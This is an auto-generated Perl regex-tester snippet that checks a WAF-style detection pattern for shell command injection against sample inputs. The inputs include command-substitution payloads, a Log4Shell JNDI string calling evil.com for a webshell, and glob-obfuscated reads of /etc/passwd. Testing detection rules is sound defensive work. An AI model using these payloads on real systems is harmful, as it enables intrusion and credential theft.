use strict;
my $str = '/get?932130-1=$(cmd)
932130-2=${cmd}
931120-3=<(cmd)
>(cmd)=931120-4
{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}
var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`
cat /etc/pa[s]swd
cat /[?]tc/pa[?]swd
/get?s=/etc/pas[s]wd"
/get?s=/etc/[!q]asswd
/get?s=/etc/[m-z]asswd
/get?s=/usr/bin/[u]name+-a
/get?exec=/bi[n]/bash
/get?932130-17=$([])
echo $(echo $(cat /etc/passwd))
echo ${asd}
cat /etc/[p//]asswd
cat /[e//]tc/[p//]asswd
cat /[e/////////]tc/[p//]asswd
ls a[b///]c
ls *[a//]c
# should not match
932130-5=Some text (in brackets).
hello [text in brackets]
take this math expression: 1/[a/-1]
plase calculate the following a/[b/1234*c]
';
my $regex = qr@\$(?:\((?:[^\(\)]*|\([^\(\)]*\))\)|\{[^\{\}]*\}|\[[^\[\]]*\])|[<>]\([^\(\)]*\)|(?:/[0-9A-Z_a-z]*\[!?[^/\]]+|\[[0-9A-Z_a-z]/+)\]@mp;
if ( $str =~ /$regex/g ) {
print "Whole match is ${^MATCH} and its start/end positions can be obtained via \$-[0] and \$+[0]\n";
# print "Capture Group 1 is $1 and its start/end positions can be obtained via \$-[1] and \$+[1]\n";
# print "Capture Group 2 is $2 ... and so on\n";
}
# ${^POSTMATCH} and ${^PREMATCH} are also available with the use of '/p'
# Named capture groups can be called via $+{name}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Perl, please visit: http://perldoc.perl.org/perlre.html